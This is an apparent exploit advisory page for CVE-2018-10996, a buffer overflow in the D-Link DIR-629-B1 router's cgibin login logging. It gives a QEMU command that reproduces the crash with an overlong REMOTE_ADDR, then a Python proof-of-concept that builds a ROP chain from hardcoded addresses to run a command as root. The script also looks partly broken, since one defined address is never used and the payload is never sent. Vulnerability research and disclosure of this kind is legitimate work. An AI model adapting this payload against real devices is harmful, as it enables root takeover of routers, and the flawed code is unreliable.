D-Link DIR-629-B1 CVE-2018-10996 – Code execution

Authors:kgsdy                    Risk:High

CVE:CVE-2018-10996              0day:Code execution

0day -id:0DAY-176173             Date:2018-05-13

Description

The weblogin_log function in /htdocs/cgibin on D-Link DIR-629-B1 devices allows attackers to execute arbitrary code or cause a denial of service (buffer overflow) via a session.cgi?ACTION=logout request involving a long REMOTE_ADDR environment variable.

Analysis

The vulnerability was found in the “/htdocs/cgibin” binary.The buffer overflow vulnerability was found in the “weblogin_log” function.

User can pass a long buffer as an ‘session.cgi’ parameter to the ‘/htdocs/cgibin’ binary using ‘REMOTE_ADDR’ function and cause the memory corruption. Furthermore, it is possible to redirect the flow of the program and execute an arbitrary code,write at any address.

Program Segmentation fault:

chroot . ./qemu  -0 "session.cgi" -E REQUEST_METHOD="POST" -E SERVER_PORT="80" -E REQUEST_URI="session.cgi?ACTION=logout" -E HTTP_REFERER="ACTION=123" -E CONTENT_LENGTH=$LEN -E CONTENT_TYPE="application/x-www-form-urlencoded"  -E HTTP_COOKIE="uid=aaaaa" -E REMOTE_ADDR="::ffff:Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab" ./htdocs/cgibin

We have a full control over the return address along with a few other registers. Full ROP chain used to execute ‘system(“ls”);’ as root user can be crafted as follows: (ASLR has been disabled for testing purposes.)

#!/usr/bin/envpython

import sys

import struct

libc =0x76736000


ra=struct.pack(">I",0x7677745C)#godget1
godget2 = struct.pack(">I",0x76777450)#godget2
bufaddr = struct.pack(">I",0x76FFF7A0)
systemaddr = struct.pack(">I",0x767872D0)#system

REMOTE_ADDR="::ffff:"+"A"*49+ra+"B"*4+bufaddr+"C"*30+godget2+"ls"

Leave a Reply